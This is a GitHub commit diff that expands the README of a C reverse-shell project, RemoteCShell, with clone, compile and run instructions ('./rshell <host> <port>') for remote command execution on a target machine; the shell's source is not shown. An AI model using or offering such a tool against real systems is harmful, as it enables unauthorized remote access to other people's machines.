Skip to content

Commit bcbf84d

Browse files
authored
Update README.md
1 parent 9b9e68f commit bcbf84d

File tree

1 file changed

+44
-2
lines changed

1 file changed

+44
-2
lines changed

README.md

Lines changed: 44 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,45 @@
1-
# Remote C Shell
1+
# Remote C Shell 🐚
22

3-
`usage : ./rshell host (port)`
3+
Welcome to the Remote C Shell repository! This C-based reverse shell enables remote command execution on a target machine.
4+
5+
## Usage 📋
6+
7+
To use the remote shell, run the following command:
8+
9+
```bash
10+
./rshell <host> <port>
11+
```
12+
13+
## Files in This Repository 📂
14+
15+
- `LICENSE`: License information for the project.
16+
- `Makefile`: Makefile to compile the project.
17+
- `README.md`: This readme file.
18+
- `rshell.c`: The source code for the reverse shell.
19+
20+
## Getting Started 🚀
21+
22+
1. **Clone the repository:**
23+
24+
```bash
25+
git clone https://github.com/fenrirsec/RemoteCShell.git
26+
cd RemoteCShell
27+
```
28+
29+
2. **Compile the source code:**
30+
31+
```bash
32+
make
33+
```
34+
35+
3. **Run the reverse shell:**
36+
37+
```bash
38+
./rshell <host> <port>
39+
```
40+
41+
Replace `<host>` with the target IP address and `<port>` with the desired port number.
42+
43+
---
44+
45+
Stay safe and use responsibly! 🛡️

0 commit comments

Comments
 (0)